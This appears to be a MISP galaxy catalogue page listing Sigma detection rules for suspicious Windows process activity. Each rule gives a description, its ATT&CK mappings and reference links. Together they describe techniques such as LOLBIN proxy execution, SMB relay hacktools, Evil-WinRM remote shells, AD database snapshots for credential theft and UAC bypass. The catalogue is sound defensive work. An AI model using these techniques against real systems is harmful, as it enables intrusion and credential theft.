The tag is: misp-galaxy:sigma-rules="Suspicious Microsoft Office Child Process"

Suspicious Microsoft Office Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10776. Table References

Links

https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e

https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A

https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi(aka_REvil)_Ransomware.yaml

https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml

https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html

https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml

https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html

https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/

https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml

Suspicious Call by Ordinal

Detects suspicious calls of DLLs in rundll32.dll exports by ordinal

The tag is: misp-galaxy:sigma-rules="Suspicious Call by Ordinal"

Suspicious Call by Ordinal has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10777. Table References

Links

https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/

https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/

https://twitter.com/cyb3rops/status/1186631731543236608

https://github.com/Neo23x0/DLLRunner

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_by_ordinal.yml

Suspicious Use of CSharp Interactive Console

Detects the execution of CSharp interactive console by PowerShell

The tag is: misp-galaxy:sigma-rules="Suspicious Use of CSharp Interactive Console"

Suspicious Use of CSharp Interactive Console has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10778. Table References

Links

https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml

PUA - Wsudo Suspicious Execution

Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator…​etc)

The tag is: misp-galaxy:sigma-rules="PUA - Wsudo Suspicious Execution"

PUA - Wsudo Suspicious Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10779. Table References

Links

https://github.com/M2Team/Privexec/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml

Use of TTDInject.exe

Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)

The tag is: misp-galaxy:sigma-rules="Use of TTDInject.exe"

Use of TTDInject.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10780. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml

Suspicious PowerShell IEX Execution Patterns

Detects suspicious ways to run Invoke-Execution using IEX alias

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell IEX Execution Patterns"

Suspicious PowerShell IEX Execution Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10781. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2

https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml

Deny Service Access Using Security Descriptor Tampering Via Sc.EXE

Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.

The tag is: misp-galaxy:sigma-rules="Deny Service Access Using Security Descriptor Tampering Via Sc.EXE"

Deny Service Access Using Security Descriptor Tampering Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10782. Table References

Links

https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/

https://www.sans.org/blog/red-team-tactics-hiding-windows-services/

https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml

Ping Hex IP

Detects a ping command that uses a hex encoded IP address

The tag is: misp-galaxy:sigma-rules="Ping Hex IP"

Ping Hex IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10783. Table References

Links

https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna

https://twitter.com/vysecurity/status/977198418354491392

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ping_hex_ip.yml

LOLBIN Execution Of The FTP.EXE Binary

Detects execution of ftp.exe script execution with the "-s" or "/s" flag and any child processes ran by ftp.exe

The tag is: misp-galaxy:sigma-rules="LOLBIN Execution Of The FTP.EXE Binary"

LOLBIN Execution Of The FTP.EXE Binary has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10784. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ftp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml

Response File Execution Via Odbcconf.EXE

Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.

The tag is: misp-galaxy:sigma-rules="Response File Execution Via Odbcconf.EXE"

Response File Execution Via Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10785. Table References

Links

https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control

https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16

https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml

Potential SMB Relay Attack Tool Execution

Detects different hacktools used for relay attacks on Windows for privilege escalation

The tag is: misp-galaxy:sigma-rules="Potential SMB Relay Attack Tool Execution"

Potential SMB Relay Attack Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 10786. Table References

Links

https://pentestlab.blog/2017/04/13/hot-potato/

https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire

https://github.com/ohpe/juicy-potato

https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

https://www.localpotato.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml

Suspicious Active Directory Database Snapshot Via ADExplorer

Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory.

The tag is: misp-galaxy:sigma-rules="Suspicious Active Directory Database Snapshot Via ADExplorer"

Suspicious Active Directory Database Snapshot Via ADExplorer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10787. Table References

Links

https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml

SafeBoot Registry Key Deleted Via Reg.EXE

Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products

The tag is: misp-galaxy:sigma-rules="SafeBoot Registry Key Deleted Via Reg.EXE"

SafeBoot Registry Key Deleted Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10788. Table References

Links

https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml

Renamed AutoIt Execution

Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.

The tag is: misp-galaxy:sigma-rules="Renamed AutoIt Execution"

Renamed AutoIt Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10789. Table References

Links

https://www.autoitscript.com/site/

https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_autoit.yml

Service Security Descriptor Tampering Via Sc.EXE

Detection of sc.exe utility adding a new service with special permission which hides that service.

The tag is: misp-galaxy:sigma-rules="Service Security Descriptor Tampering Via Sc.EXE"

Service Security Descriptor Tampering Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10790. Table References

Links

https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html

https://www.sans.org/blog/red-team-tactics-hiding-windows-services/

https://twitter.com/0gtweet/status/1628720819537936386

https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/

https://twitter.com/Alh4zr3d/status/1580925761996828672

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml

PktMon.EXE Execution

Detects execution of PktMon, a tool that captures network packets.

The tag is: misp-galaxy:sigma-rules="PktMon.EXE Execution"

PktMon.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 10791. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Pktmon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pktmon_execution.yml

Msxsl.EXE Execution

Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.

The tag is: misp-galaxy:sigma-rules="Msxsl.EXE Execution"

Msxsl.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"

Table 10792. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msxsl_execution.yml

PrintBrm ZIP Creation of Extraction

Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.

The tag is: misp-galaxy:sigma-rules="PrintBrm ZIP Creation of Extraction"

PrintBrm ZIP Creation of Extraction has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10793. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml

Renamed ZOHO Dctask64 Execution

Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation

The tag is: misp-galaxy:sigma-rules="Renamed ZOHO Dctask64 Execution"

Renamed ZOHO Dctask64 Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10794. Table References

Links

https://twitter.com/gN3mes1s/status/1222095371175911424

https://twitter.com/gN3mes1s/status/1222095963789111296

https://twitter.com/gN3mes1s/status/1222088214581825540

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml

Remote Access Tool - NetSupport Execution From Unusual Location

Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files')

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - NetSupport Execution From Unusual Location"

Table 10795. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml

File Download Via InstallUtil.EXE

Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"

The tag is: misp-galaxy:sigma-rules="File Download Via InstallUtil.EXE"

File Download Via InstallUtil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10796. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/239

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_installutil_download.yml

MSHTA Suspicious Execution 01

Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism

The tag is: misp-galaxy:sigma-rules="MSHTA Suspicious Execution 01"

MSHTA Suspicious Execution 01 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 10797. Table References

Links

https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356

http://blog.sevagas.com/?Hacking-around-HTA-files

https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997

https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script

https://twitter.com/mattifestation/status/1326228491302563846

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml

Csc.EXE Execution Form Potentially Suspicious Parent

Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.

The tag is: misp-galaxy:sigma-rules="Csc.EXE Execution Form Potentially Suspicious Parent"

Csc.EXE Execution Form Potentially Suspicious Parent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

Table 10798. Table References

Links

https://reaqta.com/2017/11/short-journey-darkvnc/

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html

https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml

New Root Certificate Installed Via Certutil.EXE

Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

The tag is: misp-galaxy:sigma-rules="New Root Certificate Installed Via Certutil.EXE"

New Root Certificate Installed Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 10799. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml

Suspicious X509Enrollment - Process Creation

Detect use of X509Enrollment

The tag is: misp-galaxy:sigma-rules="Suspicious X509Enrollment - Process Creation"

Suspicious X509Enrollment - Process Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 10800. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42

https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_x509enrollment.yml

Renamed Msdt.EXE Execution

Detects the execution of a renamed "Msdt.exe" binary

The tag is: misp-galaxy:sigma-rules="Renamed Msdt.EXE Execution"

Renamed Msdt.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10801. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msdt/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml

HackTool - WinRM Access Via Evil-WinRM

Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

The tag is: misp-galaxy:sigma-rules="HackTool - WinRM Access Via Evil-WinRM"

HackTool - WinRM Access Via Evil-WinRM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 10802. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm

https://github.com/Hackplayers/evil-winrm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_evil_winrm.yml

UEFI Persistence Via Wpbbin - ProcessCreation

Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section

The tag is: misp-galaxy:sigma-rules="UEFI Persistence Via Wpbbin - ProcessCreation"

UEFI Persistence Via Wpbbin - ProcessCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"

Table 10803. Table References

Links

https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c

https://persistence-info.github.io/Data/wpbbin.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_potential_persistence.yml

Process Reconnaissance Via Wmic.EXE

Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.

The tag is: misp-galaxy:sigma-rules="Process Reconnaissance Via Wmic.EXE"

Process Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10804. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml

UtilityFunctions.ps1 Proxy Dll

Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.

The tag is: misp-galaxy:sigma-rules="UtilityFunctions.ps1 Proxy Dll"

UtilityFunctions.ps1 Proxy Dll has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10805. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml

Potentially Suspicious Event Viewer Child Process

Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Event Viewer Child Process"

Potentially Suspicious Event Viewer Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10807. Table References

Links

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_eventvwr_susp_child_process.yml

New User Created Via Net.EXE

Identifies the creation of local users via the net.exe command.

The tag is: misp-galaxy:sigma-rules="New User Created Via Net.EXE"

New User Created Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 10808. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md

https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml

Potentially Suspicious ASP.NET Compilation Via AspNetCompiler

Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious ASP.NET Compilation Via AspNetCompiler"

Potentially Suspicious ASP.NET Compilation Via AspNetCompiler has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10809. Table References

Links

https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/

https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml

Run Once Task Execution as Configured in Registry

This rule detects the execution of Run Once task as configured in the registry

The tag is: misp-galaxy:sigma-rules="Run Once Task Execution as Configured in Registry"

Run Once Task Execution as Configured in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10810. Table References

Links

https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA

https://lolbas-project.github.io/lolbas/Binaries/Runonce/

https://twitter.com/pabraeken/status/990717080805789697

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_runonce_execution.yml

Suspicious Execution of Powershell with Base64

Commandline to launch powershell with a base64 payload

The tag is: misp-galaxy:sigma-rules="Suspicious Execution of Powershell with Base64"

Suspicious Execution of Powershell with Base64 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10811. Table References

Links

https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets

https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encode.yml

Certificate Exported Via Certutil.EXE

Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.

The tag is: misp-galaxy:sigma-rules="Certificate Exported Via Certutil.EXE"

Certificate Exported Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10812. Table References

Links

https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml

Potential PsExec Remote Execution

Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility

The tag is: misp-galaxy:sigma-rules="Potential PsExec Remote Execution"

Potential PsExec Remote Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

Table 10813. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://www.poweradmin.com/paexec/

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml

Whoami.EXE Execution With Output Option

Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.

The tag is: misp-galaxy:sigma-rules="Whoami.EXE Execution With Output Option"

Whoami.EXE Execution With Output Option has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10814. Table References

Links

https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/

https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/

https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_output.yml

Potential Process Execution Proxy Via CL_Invocation.ps1

Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"

The tag is: misp-galaxy:sigma-rules="Potential Process Execution Proxy Via CL_Invocation.ps1"

Potential Process Execution Proxy Via CL_Invocation.ps1 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10815. Table References

Links

https://twitter.com/bohops/status/948061991012327424

https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_invocation.yml

Suspicious Microsoft OneNote Child Process

Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.

The tag is: misp-galaxy:sigma-rules="Suspicious Microsoft OneNote Child Process"

Suspicious Microsoft OneNote Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

